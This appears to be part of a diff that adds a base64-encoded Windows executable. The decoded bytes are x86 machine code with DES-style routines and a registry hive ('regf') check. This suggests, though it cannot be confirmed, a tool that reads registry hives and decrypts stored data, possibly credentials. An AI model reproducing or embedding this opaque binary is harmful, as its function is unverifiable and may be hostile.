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
+/MHoGIHn/AAAAIHj/AAAADOoAOBAADOvANlAAIt+EDOrANpAAIteFDPVM/oz2ovHJQD8AADB6AjB
+ywSLqADbQACLwyUA/AAAwegIM6gA3EAAi8clAAD8AMHoEDOoAN1AAIvDJQAA/ADB6BAzqADeQACL
+xyX////8gef8AAAAwegYM6gA30AAi8Ml/////IHj/AAAAMHoGDOoAOBAADOvANlAAIt+GDOrANpA
+AIteHDPNM/kz2cHLBIvHi+slAPwAAIHlAPwAAMHoCMHtCIuAANtAADOFANxAAIvvgeUAAPwAwe0Q
+M4UA3UAAi+uB5QAA/ADB7RAzhQDeQACDxiCL74Hn/AAAAIHl/////MHtGDOFAN9AAIvrgeX////8
+geP8AAAAwe0YM4UA4EAAM4cA2UAAM4MA2kAAM9D/TCQQD4XT/f//6TMCAADHRCQQBAAAAIPGeIs+
+i14EM/oz2ovHJQD8AADB6AjBywSLqADbQACLwyUA/AAAwegIM6gA3EAAi8clAAD8AMHoEDOoAN1A
+AIvDJQAA/ADB6BAzqADeQACLxyX////8gef8AAAAwegYM6gA30AAi8Ml/////IHj/AAAAMHoGDOo
+AOBAADOvANlAAIt++DOrANpAAIte/DPNM/kz2YvHJQD8AADB6AjBywSLqADbQACLwyUA/AAAwegI
+M6gA3EAAi8clAAD8AMHoEDOoAN1AAIvDJQAA/ADB6BAzqADeQACLxyX////8wegYM6gA30AAi8Ml
+/////MHoGIHn/AAAAIHj/AAAADOoAOBAADOvANlAAIt+8DOrANpAAIte9DPVM/oz2ovHJQD8AADB
+6AjBywSLqADbQACLwyUA/AAAwegIM6gA3EAAi8clAAD8AMHoEDOoAN1AAIvDJQAA/ADB6BAzqADe
+QACLxyX////8gef8AAAAwegYM6gA30AAi8Ml/////IHj/AAAAMHoGDOoAOBAADOvANlAAIt+6DOr
+ANpAAIte7DPNM/kz2YvHJQD8AADB6AjBywSLqADbQACLwyUA/AAAwegIM6gA3EAAi8clAAD8AMHo
+EDOoAN1AAIvDJQAA/ADB6BAzqADeQACD7iCLx4Hn/AAAACX////8wegYM6gA30AAi8Ml/////IHj
+/AAAAMHoGDOoAOBAADOvANlAADOrANpAADPV/0wkEA+F2P3//8HJA8HKA4vCwegBM8ElVVVVVTPI
+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
